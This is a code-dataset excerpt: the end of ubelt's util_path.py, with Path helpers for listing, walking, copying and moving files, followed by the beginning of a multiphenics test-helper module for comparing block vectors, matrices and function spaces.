>>> assert not dpath.exists()\n >>> dpath.ensuredir()\n >>> assert dpath.exists()\n >>> dpath.rmdir()\n \"\"\"\n self.mkdir(mode=mode, parents=True, exist_ok=True)\n return self\n\n def mkdir(self, mode=511, parents=False, exist_ok=False):\n \"\"\"\n Create a new directory at this given path.\n\n Note:\n The ubelt extension is the same as the original pathlib method,\n except this returns returns the path instead of None.\n\n Args:\n mode (int) : permission bits\n parents (bool) : create parents\n exist_ok (bool) : fail if exists\n\n Returns:\n Path: returns itself\n \"\"\"\n super().mkdir(mode=mode, parents=parents, exist_ok=exist_ok)\n return self\n\n def expand(self):\n \"\"\"\n Expands user tilde and environment variables.\n\n Concise alias of ``Path(os.path.expandvars(self.expanduser()))``\n\n Returns:\n Path: path with expanded environment variables and tildes\n\n Example:\n >>> import ubelt as ub\n >>> home_v1 = ub.Path('~/').expand()\n >>> home_v2 = ub.Path.home()\n >>> print('home_v1 = {!r}'.format(home_v1))\n >>> print('home_v2 = {!r}'.format(home_v2))\n >>> assert home_v1 == home_v2\n \"\"\"\n return self.expandvars().expanduser()\n\n def expandvars(self):\n \"\"\"\n As discussed in [CPythonIssue21301]_, CPython won't be adding\n expandvars to pathlib. I think this is a mistake, so I added it in this\n extension.\n\n Returns:\n Path: path with expanded environment variables\n\n References:\n .. [CPythonIssue21301] https://bugs.python.org/issue21301\n \"\"\"\n return self.__class__(os.path.expandvars(self))\n\n def ls(self, pattern=None):\n \"\"\"\n A convenience function to list all paths in a directory.\n\n This is a wrapper around iterdir that returns the results as a list\n instead of a generator. This is mainly for faster navigation in\n IPython. 
In production code ``iterdir`` or ``glob`` should be used\n instead.\n\n Args:\n pattern (None | str):\n if specified, performs a glob instead of an iterdir.\n\n Returns:\n List['Path']: an eagerly evaluated list of paths\n\n Note:\n When pattern is specified only paths matching the pattern are\n returned, not the paths inside matched directories. This is\n different than bash semantics where the pattern is first expanded\n and then ls is performed on all matching paths.\n\n Example:\n >>> import ubelt as ub\n >>> self = ub.Path.appdir('ubelt/tests/ls')\n >>> (self / 'dir1').ensuredir()\n >>> (self / 'dir2').ensuredir()\n >>> (self / 'file1').touch()\n >>> (self / 'file2').touch()\n >>> (self / 'dir1/file3').touch()\n >>> (self / 'dir2/file4').touch()\n >>> children = self.ls()\n >>> assert isinstance(children, list)\n >>> print(ub.repr2(sorted([p.relative_to(self) for p in children])))\n [\n Path('dir1'),\n Path('dir2'),\n Path('file1'),\n Path('file2'),\n ]\n >>> children = self.ls('dir*/*')\n >>> assert isinstance(children, list)\n >>> print(ub.repr2(sorted([p.relative_to(self) for p in children])))\n [\n Path('dir1/file3'),\n Path('dir2/file4'),\n ]\n \"\"\"\n if pattern is None:\n return list(self.iterdir())\n else:\n return list(self.glob(pattern))\n\n # TODO:\n # def _glob(self):\n # \"\"\"\n # I would like some way of globbing using patterns contained in the path\n # itself. Perhaps this goes into expand?\n # \"\"\"\n # import glob\n # yield from map(self.__class__, glob.glob(self))\n\n def shrinkuser(self, home='~'):\n \"\"\"\n Shrinks your home directory by replacing it with a tilde.\n\n This is the inverse of :func:`os.path.expanduser`.\n\n Args:\n home (str): symbol used to replace the home path.\n Defaults to '~', but you might want to use '$HOME' or\n '%USERPROFILE%' instead.\n\n Returns:\n Path: shortened path replacing the home directory with a symbol\n\n Example:\n >>> import ubelt as ub\n >>> path = ub.Path('~').expand()\n >>> assert str(path.shrinkuser()) == '~'\n >>> assert str(ub.Path((str(path) + '1')).shrinkuser()) == str(path) + '1'\n >>> assert str((path / '1').shrinkuser()) == join('~', '1')\n >>> assert str((path / '1').shrinkuser('$HOME')) == join('$HOME', '1')\n >>> assert str(ub.Path('.').shrinkuser()) == '.'\n \"\"\"\n shrunk = shrinkuser(self, home)\n new = self.__class__(shrunk)\n return new\n\n def touch(self, mode=0o666, exist_ok=True):\n \"\"\"\n Create this file with the given access mode, if it doesn't exist.\n\n Returns:\n Path: returns itself\n\n Note:\n The :func:`ubelt.util_io.touch` function currently has a slightly\n different implementation. This uses whatever the pathlib version\n is. This may change in the future.\n \"\"\"\n # modify touch to return self\n # Note: util_io.touch is more expressive than standard python\n # touch, may want to use that instead.\n super().touch(mode=mode, exist_ok=exist_ok)\n return self\n\n def walk(self, topdown=True, onerror=None, followlinks=False):\n \"\"\"\n A variant of :func:`os.walk` for pathlib\n\n Args:\n topdown (bool):\n if True starts yield nodes closer to the root first otherwise\n yield nodes closer to the leaves first.\n\n onerror (Callable[[OSError], None] | None):\n A function with one argument of type OSError. 
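\n\n                (Aside: the Path-yielding walk is an adapter over\n                :func:`os.walk` that re-wraps each root; a minimal sketch of\n                the pattern)::\n\n                    import os\n                    import pathlib\n                    def _walk_paths(dpath, **kwargs):\n                        for root, dnames, fnames in os.walk(dpath, **kwargs):\n                            yield pathlib.Path(root), dnames, fnames\n\n                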
If the\n error is raised the walk is aborted, otherwise it continues.\n\n followlinks (bool):\n if True recurse into symbolic directory links\n\n Yields:\n Tuple['Path', List[str], List[str]]:\n the root path, directory names, and file names\n\n Example:\n >>> import ubelt as ub\n >>> self = ub.Path.appdir('ubelt/tests/ls')\n >>> (self / 'dir1').ensuredir()\n >>> (self / 'dir2').ensuredir()\n >>> (self / 'file1').touch()\n >>> (self / 'file2').touch()\n >>> (self / 'dir1/file3').touch()\n >>> (self / 'dir2/file4').touch()\n >>> subdirs = list(self.walk())\n >>> assert len(subdirs) == 3\n\n Example:\n >>> # Modified from the stdlib\n >>> import os\n >>> from os.path import join, getsize\n >>> import email\n >>> import ubelt as ub\n >>> base = ub.Path(email.__file__).parent\n >>> for root, dirs, files in base.walk():\n >>> print(root, \" consumes\", end=\"\")\n >>> print(sum(getsize(join(root, name)) for name in files), end=\"\")\n >>> print(\"bytes in \", len(files), \" non-directory files\")\n >>> if 'CVS' in dirs:\n >>> dirs.remove('CVS') # don't visit CVS directories\n \"\"\"\n cls = self.__class__\n walker = os.walk(self, topdown=topdown, onerror=onerror,\n followlinks=followlinks)\n for root, dnames, fnames in walker:\n yield (cls(root), dnames, fnames)\n\n def __add__(self, other):\n \"\"\"\n Returns a new string starting with this fspath representation.\n\n Returns:\n str\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Note:\n It is not recommended to write new code that uses this behavior.\n This exists to make it easier to transition existing str-based\n paths to pathlib.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> base_ = ub.Path('base/')\n >>> base2 = ub.Path('base/2')\n >>> assert base + 'foo' == 'basefoo'\n >>> assert base_ + 'foo' == 'basefoo'\n >>> assert base2 + 'foo' == str(base2.augment(tail='foo'))\n \"\"\"\n return os.fspath(self) + other\n\n def __radd__(self, other):\n \"\"\"\n Returns a new string ending with this fspath representation.\n\n Returns:\n str\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Note:\n It is not recommended to write new code that uses this behavior.\n This exists to make it easier to transition existing str-based\n paths to pathlib.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> base_ = ub.Path('base/')\n >>> base2 = ub.Path('base/2')\n >>> assert 'foo' + base == 'foobase'\n >>> assert 'foo' + base_ == 'foobase'\n >>> assert 'foo' + base2 == str(base2.augment(dpath='foobase'))\n \"\"\"\n return other + os.fspath(self)\n\n def endswith(self, suffix, *args):\n \"\"\"\n Test if the fspath representation ends with ``suffix``.\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Args:\n suffix (str | Tuple[str, ...]):\n One or more suffixes to test for\n\n *args:\n start (int): if specified begin testing at this position.\n end (int): if specified stop testing at this position.\n\n Returns:\n bool: True if any of the suffixes match.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> assert base.endswith('se')\n >>> assert not base.endswith('be')\n >>> # test start / stop cases\n >>> assert ub.Path('aabbccdd').endswith('cdd', 5)\n >>> assert not ub.Path('aabbccdd').endswith('cdd', 6)\n >>> assert ub.Path('aabbccdd').endswith('cdd', 5, 10)\n >>> assert not ub.Path('aabbccdd').endswith('cdd', 5, 7)\n >>> # test tuple case\n 
>>> assert ub.Path('aabbccdd').endswith(('foo', 'cdd'))\n >>> assert ub.Path('foo').endswith(('foo', 'cdd'))\n >>> assert not ub.Path('bar').endswith(('foo', 'cdd'))\n \"\"\"\n return os.fspath(self).endswith(suffix, *args)\n\n def startswith(self, prefix, *args):\n \"\"\"\n Test if the fspath representation starts with ``prefix``.\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Args:\n prefix (str | Tuple[str, ...]):\n One or more prefixes to test for\n\n *args:\n start (int): if specified begin testing at this position.\n end (int): if specified stop testing at this position.\n\n Returns:\n bool: True if any of the prefixes match.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> assert base.startswith('base')\n >>> assert not base.startswith('all your')\n >>> # test start / stop cases\n >>> assert ub.Path('aabbccdd').startswith('aab', 0)\n >>> assert ub.Path('aabbccdd').startswith('aab', 0, 5)\n >>> assert not ub.Path('aabbccdd').startswith('aab', 1, 5)\n >>> assert not ub.Path('aabbccdd').startswith('aab', 0, 2)\n >>> # test tuple case\n >>> assert ub.Path('aabbccdd').startswith(('foo', 'aab'))\n >>> assert ub.Path('foo').startswith(('foo', 'aab'))\n >>> assert not ub.Path('bar').startswith(('foo', 'aab'))\n \"\"\"\n return os.fspath(self).startswith(prefix, *args)\n\n # More shutil functionality\n # This is discussed in https://peps.python.org/pep-0428/#filesystem-modification\n\n def _request_copy_function(self, follow_file_symlinks=True,\n follow_dir_symlinks=True, meta='stats'):\n \"\"\"\n Get a copy_function based on specified capabilities\n \"\"\"\n import shutil\n from functools import partial\n if meta is None:\n copy_function = partial(shutil.copyfile, follow_symlinks=follow_file_symlinks)\n elif meta == 'stats':\n copy_function = partial(shutil.copy2, follow_symlinks=follow_file_symlinks)\n elif meta == 'mode':\n copy_function = partial(shutil.copy, follow_symlinks=follow_file_symlinks)\n else:\n raise KeyError(meta)\n return copy_function\n\n def copy(self, dst, follow_file_symlinks=False, follow_dir_symlinks=False,\n meta='stats', overwrite=False):\n \"\"\"\n Copy this file or directory to dst.\n\n By default files are never overwritten and symlinks are copied as-is.\n\n At a basic level (i.e. ignoring symlinks) for each path argument\n (``src`` and ``dst``) these can either be files, directories, or not\n exist. Given these three states, the following table summarizes how\n this function copies this path to its destination.\n\n TextArt:\n\n +----------+------------------------+------------------------+----------+\n | dst | dir | file | no-exist |\n +----------+ | | |\n | src | | | |\n +==========+========================+========================+==========+\n | dir | error-or-overwrite-dst | error | dst |\n +----------+------------------------+------------------------+----------+\n | file | dst / src.name | error-or-overwrite-dst | dst |\n +----------+------------------------+------------------------+----------+\n | no-exist | error | error | error |\n +----------+------------------------+------------------------+----------+\n\n In general, the contents of src will be the contents of dst, except for\n the one case where a file is copied into an existing directory. 
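\n\n        The table above as plain decision logic (a sketch only; the real\n        method also threads the symlink and metadata options through)::\n\n            import os.path\n            def _copy_plan(src, dst, overwrite=False):\n                if not os.path.exists(src):\n                    raise FileExistsError('The source path does not exist')\n                if os.path.isdir(src):\n                    if os.path.isfile(dst):\n                        raise FileExistsError('cannot copy a directory onto a file')\n                    if os.path.isdir(dst) and not overwrite:\n                        raise FileExistsError('pass overwrite=True to replace dst')\n                    return dst\n                # a file copied into an existing dir gets the file's name appended\n                real_dst = os.path.join(dst, os.path.basename(src)) if os.path.isdir(dst) else dst\n                if os.path.exists(real_dst) and not overwrite:\n                    raise FileExistsError('pass overwrite=True to replace dst')\n                return real_dst\n\n        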
In this\n case the name is used to construct a fully qualified destination.\n\n Ignore:\n # Enumerate cases\n rows = [\n {'src': 'no-exist', 'dst': 'no-exist', 'result': 'error'},\n {'src': 'no-exist', 'dst': 'file', 'result': 'error'},\n {'src': 'no-exist', 'dst': 'dir', 'result': 'error'},\n\n {'src': 'file', 'dst': 'no-exist', 'result': 'dst'},\n {'src': 'file', 'dst': 'dir', 'result': 'dst / src.name'},\n {'src': 'file', 'dst': 'file', 'result': 'error-or-overwrite-dst'},\n\n {'src': 'dir', 'dst': 'no-exist', 'result': 'dst'},\n {'src': 'dir', 'dst': 'dir', 'result': 'error-or-overwrite-dst'},\n {'src': 'dir', 'dst': 'file', 'result': 'error'},\n ]\n import pandas as pd\n df = pd.DataFrame(rows)\n piv = df.pivot(['src'], ['dst'], 'result')\n print(piv.to_markdown(tablefmt=\"grid\", index=True))\n\n See: ~/code/ubelt/tests/test_path.py for test cases\n\n Args:\n dst (str | PathLike):\n if ``src`` is a file and ``dst`` does not exist, copies this to ``dst``\n if ``src`` is a file and ``dst`` is a directory, copies this to ``dst / src.name``\n\n if ``src`` is a directory and ``dst`` does not exist, copies this to ``dst``\n if ``src`` is a directory and ``dst`` is a directory, errors unless\n overwrite is True, in which case, copies this to ``dst`` and\n overwrites anything conflicting path.\n\n follow_file_symlinks (bool):\n If True and src is a link, the link will be resolved before\n it is copied (i.e. the data is duplicated), otherwise just\n the link itself will be copied.\n\n follow_dir_symlinks (bool):\n if True when src is a directory and contains symlinks to\n other directories, the contents of the linked data are\n copied, otherwise when False only the link itself is\n copied.\n\n meta (str | None):\n Indicates what metadata bits to copy. This can be 'stats' which\n tries to copy all metadata (i.e. like :py:func:`shutil.copy2`),\n 'mode' which copies just the permission bits (i.e. like\n :py:func:`shutil.copy`), or None, which ignores all metadata\n (i.e. like :py:func:`shutil.copyfile`).\n\n overwrite (bool):\n if False, and target file exists, this will raise an error,\n otherwise the file will be overwritten.\n\n Returns:\n Path: where the path was copied to\n\n Note:\n This is implemented with a combination of :func:`shutil.copy`,\n :func:`shutil.copy2`, and :func:`shutil.copytree`, but the defaults\n and behavior here are different (and ideally safer and more\n intuitive).\n\n Note:\n Unlike cp on Linux, copying a src directory into a dst directory\n will not implicitly add the src directory name to the dst\n directory. 
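\n\n            (The ``meta`` argument above maps onto shutil's three copy\n            helpers; a sketch of that dispatch, mirroring the private\n            ``_request_copy_function``)::\n\n                import shutil\n                from functools import partial\n                def _pick_copy_function(meta='stats', follow_symlinks=True):\n                    table = {'stats': shutil.copy2, 'mode': shutil.copy, None: shutil.copyfile}\n                    return partial(table[meta], follow_symlinks=follow_symlinks)\n\n            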
This means we cannot copy directory ``/``\n to ```` and expect the result to be ``/``.\n\n Conceptually you can expect ``//``\n to exist in ``/``.\n\n Example:\n >>> import ubelt as ub\n >>> root = ub.Path.appdir('ubelt', 'tests', 'path', 'copy').delete().ensuredir()\n >>> paths = {}\n >>> dpath = (root / 'orig').ensuredir()\n >>> clone0 = (root / 'dst_is_explicit').ensuredir()\n >>> clone1 = (root / 'dst_is_parent').ensuredir()\n >>> paths['fpath'] = (dpath / 'file0.txt').touch()\n >>> paths['empty_dpath'] = (dpath / 'empty_dpath').ensuredir()\n >>> paths['nested_dpath'] = (dpath / 'nested_dpath').ensuredir()\n >>> (dpath / 'nested_dpath/d0').ensuredir()\n >>> (dpath / 'nested_dpath/d0/f1.txt').touch()\n >>> (dpath / 'nested_dpath/d0/f2.txt').touch()\n >>> print('paths = {}'.format(ub.repr2(paths, nl=1)))\n >>> assert all(p.exists() for p in paths.values())\n >>> paths['fpath'].copy(clone0 / 'file0.txt')\n >>> paths['fpath'].copy(clone1)\n >>> paths['empty_dpath'].copy(clone0 / 'empty_dpath')\n >>> paths['empty_dpath'].copy((clone1 / 'empty_dpath_alt').ensuredir(), overwrite=True)\n >>> paths['nested_dpath'].copy(clone0 / 'nested_dpath')\n >>> paths['nested_dpath'].copy((clone1 / 'nested_dpath_alt').ensuredir(), overwrite=True)\n \"\"\"\n import shutil\n copy_function = self._request_copy_function(\n follow_file_symlinks=follow_file_symlinks,\n follow_dir_symlinks=follow_dir_symlinks, meta=meta)\n if self.is_dir():\n if sys.version_info[0:2] < (3, 8): # nocover\n copytree = _compat_copytree\n else:\n copytree = shutil.copytree\n dst = copytree(\n self, dst, copy_function=copy_function,\n symlinks=not follow_dir_symlinks, dirs_exist_ok=overwrite)\n elif self.is_file():\n if not overwrite:\n dst = Path(dst)\n if dst.is_dir():\n real_dst = dst / self.name\n else:\n real_dst = dst\n if real_dst.exists():\n raise FileExistsError('Cannot overwrite existing file unless overwrite=True')\n dst = copy_function(self, dst)\n else:\n raise FileExistsError('The source path does not exist')\n return Path(dst)\n\n def move(self, dst, follow_file_symlinks=False, follow_dir_symlinks=False,\n meta='stats'):\n \"\"\"\n Move a file from one location to another, or recursively move a\n directory from one location to another.\n\n This method will refuse to overwrite anything, and there is currently\n no overwrite option for technical reasons. This may change in the\n future.\n\n Args:\n dst (str | PathLike):\n A non-existing path where this file will be moved.\n\n follow_file_symlinks (bool):\n If True and src is a link, the link will be resolved before\n it is copied (i.e. the data is duplicated), otherwise just\n the link itself will be copied.\n\n follow_dir_symlinks (bool):\n if True when src is a directory and contains symlinks to\n other directories, the contents of the linked data are\n copied, otherwise when False only the link itself is\n copied.\n\n meta (str | None):\n Indicates what metadata bits to copy. This can be 'stats' which\n tries to copy all metadata (i.e. like shutil.copy2), 'mode'\n which copies just the permission bits (i.e. like shutil.copy),\n or None, which ignores all metadata (i.e. like\n shutil.copyfile).\n\n Note:\n This method will refuse to overwrite anything.\n\n This is implemented via :func:`shutil.move`, which depends heavily\n on :func:`os.rename` semantics. For this reason, this function\n will error if it would overwrite any data. 
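\n\n            The refuse-to-overwrite contract reduced to its core (sketch;\n            the real method also threads the copy_function choice through)::\n\n                import os.path\n                import shutil\n                def _safe_move(src, dst):\n                    if os.path.exists(dst):\n                        raise FileExistsError('destination already exists')\n                    return shutil.move(src, dst)\n\n            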
If you want an\n overwriting variant of move we recommend you either either copy the\n data, and then delete the original (potentially inefficient), or\n use :func:`shutil.move` directly if you know how :func:`os.rename`\n works on your system.\n\n Returns:\n Path: where the path was moved to\n\n Example:\n >>> import ubelt as ub\n >>> dpath = ub.Path.appdir('ubelt', 'tests', 'path', 'move').delete().ensuredir()\n >>> paths = {}\n >>> paths['dpath0'] = (dpath / 'dpath0').ensuredir()\n >>> paths['dpath00'] = (dpath / 'dpath0' / 'sub0').ensuredir()\n >>> paths['fpath000'] = (dpath / 'dpath0' / 'sub0' / 'f0.txt').touch()\n >>> paths['fpath001'] = (dpath / 'dpath0' / 'sub0' / 'f1.txt').touch()\n >>> paths['dpath01'] = (dpath / 'dpath0' / 'sub1').ensuredir()\n >>> print('paths = {}'.format(ub.repr2(paths, nl=1)))\n >>> assert all(p.exists() for p in paths.values())\n >>> paths['dpath0'].move(dpath / 'dpath1')\n \"\"\"\n # Behave more like POSIX move to avoid potential confusing behavior\n if exists(dst):\n raise FileExistsError(\n 'Moves are only allowed to locations that dont exist')\n import shutil\n copy_function = self._request_copy_function(\n follow_file_symlinks=follow_file_symlinks,\n follow_dir_symlinks=follow_dir_symlinks, meta=meta)\n real_dst = shutil.move(self, dst, copy_function=copy_function)\n return Path(real_dst)\n\nif sys.version_info[0:2] < (3, 8): # nocover\n\n # Vendor in a nearly modern copytree for Python 3.6 and 3.7\n def _compat_copytree(src, dst, symlinks=False, ignore=None,\n copy_function=None, ignore_dangling_symlinks=False,\n dirs_exist_ok=False):\n \"\"\"\n A vendored shutil.copytree for older pythons based on the 3.10\n implementation\n \"\"\"\n from shutil import Error, copystat, copy2, copy\n with os.scandir(src) as itr:\n entries = list(itr)\n\n if ignore is not None:\n ignored_names = ignore(os.fspath(src), [x.name for x in entries])\n else:\n ignored_names = set()\n\n os.makedirs(dst, exist_ok=dirs_exist_ok)\n errors = []\n use_srcentry = copy_function is copy2 or copy_function is copy\n\n for srcentry in entries:\n if srcentry.name in ignored_names:\n continue\n srcname = os.path.join(src, srcentry.name)\n dstname = os.path.join(dst, srcentry.name)\n srcobj = srcentry if use_srcentry else srcname\n try:\n is_symlink = srcentry.is_symlink()\n if is_symlink and os.name == 'nt':\n # Special check for directory junctions, which appear as\n # symlinks but we want to recurse.\n # Not available on 3.6, use our impl instead\n # lstat = srcentry.stat(follow_symlinks=False)\n # if lstat.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT:\n # is_symlink = False\n from ubelt._win32_links import _win32_is_junction\n if _win32_is_junction(srcentry):\n is_symlink = False\n if is_symlink:\n linkto = os.readlink(srcname)\n if symlinks:\n # We can't just leave it to `copy_function` because legacy\n # code with a custom `copy_function` may rely on copytree\n # doing the right thing.\n os.symlink(linkto, dstname)\n copystat(srcobj, dstname, follow_symlinks=not symlinks)\n else:\n # ignore dangling symlink if the flag is on\n if not os.path.exists(linkto) and ignore_dangling_symlinks:\n continue\n # otherwise let the copy occur. 
copy2 will raise an error\n                    if srcentry.is_dir():\n                        _compat_copytree(srcobj, dstname, symlinks, ignore,\n                                         copy_function,\n                                         dirs_exist_ok=dirs_exist_ok)\n                    else:\n                        copy_function(srcobj, dstname)\n                elif srcentry.is_dir():\n                    _compat_copytree(srcobj, dstname, symlinks, ignore,\n                                     copy_function,\n                                     dirs_exist_ok=dirs_exist_ok)\n                else:\n                    # Will raise a SpecialFileError for unsupported file types\n                    copy_function(srcobj, dstname)\n            # catch the Error from the recursive copytree so that we can\n            # continue with other files\n            except Error as err:\n                errors.extend(err.args[0])\n            except OSError as why:\n                errors.append((srcname, dstname, str(why)))\n        try:\n            copystat(src, dst)\n        except OSError as why:\n            # Copying file access times may fail on Windows\n            if getattr(why, 'winerror', None) is None:\n                errors.append((src, dst, str(why)))\n        if errors:\n            raise Error(errors)\n        return dst\n","repo_name":"Erotemic/ubelt","sub_path":"ubelt/util_path.py","file_name":"util_path.py","file_ext":"py","file_size_in_byte":60291,"program_lang":"python","lang":"en","doc_type":"code","stars":694,"dataset":"github-code","pt":"72"}
+{"seq_id":"35286961826","text":"import numbers\nimport pytest\nfrom _pytest.mark import ParameterSet\nfrom numpy import allclose as float_array_equal, array_equal as integer_array_equal, bmat, hstack, hstack as bvec, integer, issubdtype, sort, unique, vstack\nfrom dolfin import assemble, Constant, DOLFIN_EPS, dx, Expression, FiniteElement, Function, FunctionSpace, inner, MixedElement, project, SubDomain, TensorElement, TensorFunctionSpace, VectorElement, VectorFunctionSpace\nfrom dolfin.cpp.la import GenericMatrix, GenericVector\nfrom multiphenics import assign, block_assemble, block_assign, BlockDirichletBC, BlockFunction, block_split, BlockTestFunction, BlockTrialFunction, DirichletBC\n\n# ================ PYTEST HELPER ================ #\ndef pytest_mark_slow(item):\n    return pytest.param(item, marks=pytest.mark.slow)\n\ndef pytest_mark_slow_for_cartesian_product(generator_1, generator_2):\n    for i in generator_1():\n        for j in generator_2():\n            slow = False\n            if isinstance(i, ParameterSet):\n                assert len(i.marks) == 1\n                assert i.marks[0].name == \"slow\"\n                assert len(i.values) == 1\n                i = i.values[0]\n                slow = True\n            if isinstance(j, ParameterSet):\n                assert len(j.marks) == 1\n                assert j.marks[0].name == \"slow\"\n                assert len(j.values) == 1\n                j = j.values[0]\n                slow = True\n            assert not isinstance(i, ParameterSet)\n            assert not isinstance(j, ParameterSet)\n            if slow:\n                yield pytest_mark_slow((i, j))\n            else:\n                yield (i, j)\n\n# ================ EQUALITY BETWEEN ARRAYS ================ #\n# Exact comparison for integer arrays, floating point tolerance otherwise.\n# Note: numpy dtypes are not instances of numbers.Integral, so the integer\n# branch must be detected with numpy.issubdtype rather than isinstance.\ndef array_equal(array1, array2):\n    if issubdtype(array1.dtype, integer) and issubdtype(array2.dtype, integer):\n        return len(array1) == len(array2) and integer_array_equal(array1, array2)\n    else:\n        return len(array1) == len(array2) and float_array_equal(array1, array2)\n\n# This function is required because ordering of dofs is different between dolfin and block libraries\ndef array_sorted_equal(array1, array2):\n    return array_equal(sort(array1), sort(array2))\n\n# This function is required because ordering of dofs is different between dolfin and block libraries,\n# and because unique elements must be extracted when comparing tensors on subdomains.\ndef array_unique_equal(array1, array2):\n    return array_equal(unique(array1), unique(array2))\n\n# ================ EQUALITY BETWEEN DOFS ================ #\ndef assert_owned_local_dofs(owned_local_dofs, block_owned_local_dofs):\n    assert 
array_sorted_equal(owned_local_dofs, block_owned_local_dofs)\n\ndef assert_unowned_local_dofs(unowned_local_dofs, block_unowned_local_dofs):\n # Numbering of unowned dofs may be different; we can only check that the sizes\n # of the two vectors are consistent\n assert len(unowned_local_dofs) == len(block_unowned_local_dofs)\n\ndef assert_global_dofs(global_dofs, block_global_dofs):\n assert array_sorted_equal(global_dofs, block_global_dofs)\n\ndef assert_tabulated_dof_coordinates(dof_coordinates, block_dof_coordinates):\n assert array_equal(dof_coordinates, block_dof_coordinates)\n\n# ================ EQUALITY BETWEEN BLOCK VECTORS ================ #\ndef assert_block_vectors_equal(rhs, block_rhs, block_V):\n if isinstance(rhs, tuple):\n rhs1 = rhs[0]\n rhs2 = rhs[1]\n else:\n rhs1 = rhs\n rhs2 = None\n comm = block_rhs.mpi_comm()\n if rhs2 is not None:\n map_block_to_original = allgather((block_V.block_dofmap().block_to_original(0), block_V.block_dofmap().block_to_original(1)), comm, block_dofmap=block_V.block_dofmap(), dofmap=(block_V[0].dofmap(), block_V[1].dofmap()))\n rhs1g = allgather(rhs1, comm)\n rhs2g = allgather(rhs2, comm)\n rhsg = bvec([rhs1g, rhs2g])\n else:\n map_block_to_original = allgather(block_V.block_dofmap().block_to_original(0), comm, block_dofmap=block_V.block_dofmap(), dofmap=block_V[0].dofmap())\n rhs1g = allgather(rhs1, comm)\n rhsg = rhs1g\n block_rhsg = allgather(block_rhs, comm)\n assert block_rhsg.shape[0] == len(map_block_to_original)\n rhsg_for_assert = block_rhsg*0.\n for (block, original) in map_block_to_original.items():\n rhsg_for_assert[block] = rhsg[original]\n assert array_equal(rhsg_for_assert, block_rhsg)\n\n# ================ EQUALITY BETWEEN BLOCK MATRICES ================ #\ndef assert_block_matrices_equal(lhs, block_lhs, block_V):\n if isinstance(lhs, tuple):\n lhs11 = lhs[0][0]\n lhs12 = lhs[0][1]\n lhs21 = lhs[1][0]\n lhs22 = lhs[1][1]\n else:\n lhs11 = lhs\n lhs12 = None\n lhs21 = None\n lhs22 = None\n comm = block_lhs.mpi_comm()\n if lhs22 is not None:\n map_block_to_original = allgather((block_V.block_dofmap().block_to_original(0), block_V.block_dofmap().block_to_original(1)), comm, block_dofmap=block_V.block_dofmap(), dofmap=(block_V[0].dofmap(), block_V[1].dofmap()))\n lhs11g = allgather(lhs11, comm)\n lhs12g = allgather(lhs12, comm)\n lhs21g = allgather(lhs21, comm)\n lhs22g = allgather(lhs22, comm)\n lhsg = bmat([[lhs11g, lhs12g], [lhs21g, lhs22g]])\n else:\n map_block_to_original = allgather(block_V.block_dofmap().block_to_original(0), comm, block_dofmap=block_V.block_dofmap(), dofmap=block_V[0].dofmap())\n lhs11g = allgather(lhs11, comm)\n lhsg = lhs11g\n block_lhsg = allgather(block_lhs, comm)\n assert block_lhsg.shape[0] == len(map_block_to_original)\n assert block_lhsg.shape[1] == len(map_block_to_original)\n lhsg_for_assert = block_lhsg*0.\n for (block_i, original_i) in map_block_to_original.items():\n for (block_j, original_j) in map_block_to_original.items():\n lhsg_for_assert[block_i, block_j] = lhsg[original_i, original_j]\n assert array_equal(lhsg_for_assert, block_lhsg)\n\n# ================ EQUALITY BETWEEN BLOCK FUNCTIONS ================ #\ndef assert_block_functions_equal(functions, block_function, block_V):\n if functions is None and block_function is None:\n pass\n elif isinstance(functions, tuple):\n assert_block_vectors_equal((functions[0].vector(), functions[1].vector()), block_function.block_vector(), block_V)\n else:\n assert_block_vectors_equal(functions.vector(), block_function.block_vector(), block_V)\n\ndef 
assert_functions_manipulations(functions, block_V):\n n_blocks = len(functions)\n assert n_blocks in (1, 2)\n # a) Convert from a list of Functions to a BlockFunction\n block_function_a = BlockFunction(block_V)\n for (index, function) in enumerate(functions):\n assign(block_function_a.sub(index), function)\n # Block vector should have received the data stored in the list of Functions\n if n_blocks == 1:\n assert_block_functions_equal(functions[0], block_function_a, block_V)\n else:\n assert_block_functions_equal((functions[0], functions[1]), block_function_a, block_V)\n # b) Test block_assign\n block_function_b = BlockFunction(block_V)\n block_assign(block_function_b, block_function_a)\n # Each sub function should now contain the same data as the original block function\n for index in range(n_blocks):\n assert array_equal(block_function_b.sub(index).vector().get_local(), block_function_a.sub(index).vector().get_local())\n # The two block vectors should store the same data\n assert array_equal(block_function_b.block_vector().get_local(), block_function_a.block_vector().get_local())\n\n# ================ FUNCTION SPACES GENERATOR ================ #\ndef StokesFunctionSpace(mesh, family, degree):\n stokes_element = StokesElement(family, mesh.ufl_cell(), degree)\n return FunctionSpace(mesh, stokes_element)\n\ndef StokesElement(family, cell, degree):\n V_element = VectorElement(family, cell, degree + 1)\n Q_element = FiniteElement(family, cell, degree)\n return MixedElement(V_element, Q_element)\n\ndef FunctionAndRealSpace(mesh, family, degree):\n function_and_real_element = FunctionAndRealElement(family, mesh.ufl_cell(), degree)\n return FunctionSpace(mesh, function_and_real_element)\n\ndef FunctionAndRealElement(family, cell, degree):\n V_element = FiniteElement(family, cell, degree)\n R_element = FiniteElement(\"Real\", cell, 0)\n return MixedElement(V_element, R_element)\n\ndef get_function_spaces_1():\n return (\n lambda mesh: FunctionSpace(mesh, \"Lagrange\", 1),\n pytest_mark_slow(lambda mesh: FunctionSpace(mesh, \"Lagrange\", 2)),\n lambda mesh: VectorFunctionSpace(mesh, \"Lagrange\", 1),\n pytest_mark_slow(lambda mesh: VectorFunctionSpace(mesh, \"Lagrange\", 2)),\n pytest_mark_slow(lambda mesh: TensorFunctionSpace(mesh, \"Lagrange\", 1)),\n pytest_mark_slow(lambda mesh: TensorFunctionSpace(mesh, \"Lagrange\", 2)),\n lambda mesh: StokesFunctionSpace(mesh, \"Lagrange\", 1),\n pytest_mark_slow(lambda mesh: StokesFunctionSpace(mesh, \"Lagrange\", 2)),\n lambda mesh: FunctionSpace(mesh, \"Real\", 0),\n 